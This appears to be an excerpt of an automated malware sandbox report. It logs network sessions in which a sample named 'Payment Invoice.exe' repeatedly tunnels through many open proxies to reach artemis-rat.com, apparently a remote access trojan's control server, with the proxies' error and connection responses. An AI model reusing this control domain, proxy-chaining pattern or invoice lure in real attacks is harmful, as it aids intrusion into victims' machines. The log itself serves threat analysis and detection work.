                                                                Mar 11, 2024 16:15:33.511389017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1519192.168.2.45459079.110.202.13180817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.323838949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1520192.168.2.454739172.67.250.212807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.326040030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.756879091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.917463064 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1521192.168.2.45382891.189.177.18931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.326164961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.386468887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.437314034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.511409998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.589310884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.911591053 CET536INHTTP/1.1 403 Forbidden
                                                                Server: squid/5.7
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:45 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 3628
                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                Vary: Accept-Language
                                                                Content-Language: en
                                                                X-Cache: MISS from lb1
                                                                X-Cache-Lookup: NONE from lb1:3128
                                                                Via: 1.1 lb1 (squid/5.7)
                                                                Connection: close
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundatio


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1522192.168.2.45474545.14.174.148807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.326246023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.873647928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.034231901 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1523192.168.2.45461620.206.106.192807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.326248884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.027108908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.669779062 CET319INHTTP/1.1 403 Forbidden
                                                                Server: squid
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:25 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 17
                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                X-Cache: MISS from cdn-fintech.info
                                                                X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                Connection: keep-alive
                                                                Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                Data Ascii: ERR_ACCESS_DENIED


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1524192.168.2.454734162.159.242.252807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.326440096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.823903084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.985452890 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1525192.168.2.45460346.47.197.21031287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.326987982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.089411974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.090122938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.089597940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.089576960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.089483023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.912739038 CET536INHTTP/1.1 403 Forbidden
                                                                Server: squid
                                                                Mime-Version: 1.0
                                                                Date: Mon, 11 Mar 2024 15:15:33 GMT
                                                                Content-Type: text/html;charset=utf-8
                                                                Content-Length: 3699
                                                                X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                X-Cache: MISS from host
                                                                X-Cache-Lookup: NONE from host:3128
                                                                Connection: close
                                                                Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e d0 9e d0 a8 d0 98 d0 91 d0 9a d0 90 3a 20 d0 97 d0 b0 d0 bf d1 80 d0 be d1 88 d0 b5 d0 bd d0 bd d1 8b d0 b9 20 55 52 4c 20 d0 bd d0 b5 20 d0 bc d0 be d0 b6 d0 b5 d1 82 20 d0 b1 d1 8b d1 82 d1 8c 20 d0
                                                                Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>: URL


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1526192.168.2.454630194.233.78.142496287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.327078104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.089492083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.277025938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.321851015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.386380911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.511454105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.532576084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.589310884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1527192.168.2.45412065.21.24.81807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.327133894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.828685999 CET309INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.25.3
                                                                Date: Mon, 11 Mar 2024 15:14:24 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 157
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1528192.168.2.45473575.84.199.80807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.327133894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.823904991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527187109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.620950937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.817898035 CET60INHTTP/1.0 200 Connection Established
                                                                Proxy-agent: Apache


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1529192.168.2.453773211.93.2.19073027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.327784061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.832134962 CET90INHTTP/1.1 200 OK
                                                                Content-Type: application/json
                                                                Connection: close
                                                                Content-Length: 55


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1530192.168.2.453840207.180.198.241372097076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.327790976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.327512026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.527024984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.620805025 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:45.624568939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:57.623344898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:09.717322111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:33.714243889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:21.823642969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1531192.168.2.45458847.100.236.2380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.328063011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1532192.168.2.45470045.196.151.9754327076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.332429886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.549957991 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                Server: FaaS v1.3-20220203-7fa38bd5af
                                                                Date: Mon, 11 Mar 2024 15:15:21 GMT
                                                                Content-Type: text/plain; charset=utf-8
                                                                Content-Length: 65
                                                                Proxy-Authenticate: Basic realm="Proxy"
                                                                Connection: close
                                                                Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1533192.168.2.4498605.252.23.22010807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.337625027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1534192.168.2.45462694.177.106.17823247076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:21.348325014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
